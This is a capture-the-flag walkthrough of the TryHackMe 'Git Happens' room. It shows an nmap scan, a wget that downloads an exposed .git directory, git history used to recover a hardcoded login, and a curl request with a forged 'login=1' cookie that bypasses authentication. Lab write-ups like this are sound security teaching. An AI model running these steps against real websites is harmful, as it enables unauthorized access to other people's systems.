Tryhackme: Git Happens — WalkThrough
Today, we will be doing Git Happens from TryHackMe which is labeled as a beginner-level room that aims at teaching version control (git) misconfigurations and stupid mistakes that developers may make which ultimately lead to serious security issues. Without further ado, let’s connect to our THM OpenVPN network and start hacking!!!
Port Scanning
┌──(kiran㉿kali)-[~]
└─$ nmap -sC -sV 10.10.201.254 -oA nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 18:17 +0545
Nmap scan report for 10.10.201.254
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-git:
| 10.10.201.254:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
A directory .git
was discovered by nmap. After navigating to the URL, we got the following contents as listed.
.git Directory Listing
Looks like a git repository. Lets download all the files and investigate locally.
$ wget http://10.10.191.151/.git/ --recursive --no-parent
--2021-05-20 17:47:05-- http://10.10.191.151/.git/
Connecting to 10.10.191.151:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘10.10.191.151/.git/index.html’
<SNIP>
Port 80
There is a login page in port 80.
Analyzing the repository
Apart from the git directory structure, I couldn’t find any interesting files. Now, let’s use the git commands to look at what exactly is this repository is about. Command git status
shows the current state of the repo.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git status
On branch master
Changes not staged for commit:
(use "git add/rm <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
deleted: .gitlab-ci.yml
deleted: Dockerfile
deleted: README.md
deleted: css/style.css
deleted: dashboard.html
deleted: default.conf
deleted: index.html
no changes added to commit (use "git add" and/or "git commit -a")
We can see quite a few files have been recently deleted but the changes have not been committed. It’s possible to restore the files with git restore <file>
command. I restored the files index.html
and dashboard.html
and analyzed the source code. The JavaScript code was heavily obfuscated. There must be another way.
Its time to analyze the logs. Lets harness the true power of version control system i.e, going back in time.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
<SNIP>
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
Back into the logs, there was a commit made in July 23 where the login page development was just finished and the code obfuscation has not been done yet. Lets checkout to that previous version of code i.e, 395e087334d613d5e423cdf8f7be27196a360459
.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at 395e087 Made the login page, boss!
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ ls
css dashboard.html index.html
After analyzing the source code of index.html, credentials to sign into the website was left over in cleartext.
<script>
function login() {
let form = document.getElementById("login-form");
console.log(form.elements);
let username = form.elements["username"].value;
let password = form.elements["password"].value;
if (
username === "admin" &&
password === "<REDACTED>"
) {
document.cookie = "login=1";
window.location.href = "/dashboard.html";
} else {
document.getElementById("error").innerHTML =
"INVALID USERNAME OR PASSWORD!";
}
}
</script>
After verifying the login, cookie login=1
is set by the JavaScript. Lets authenticate ourselves using this cookie to get access to the dashboard.html
.
┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ curl http://10.10.123.54/dashboard.html -H 'Cookie: login=1' -L
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Awesome!</title>
<link rel="stylesheet" href="/css/style.css" />
</head>
<body onload="checkCookie()">
<p class="rainbow-text">Awesome! Use the password you input as the flag!</p>
As it says, we can use that password as the flag to be inputted for the challenge.
Happy Hacking!!
Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion.
I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.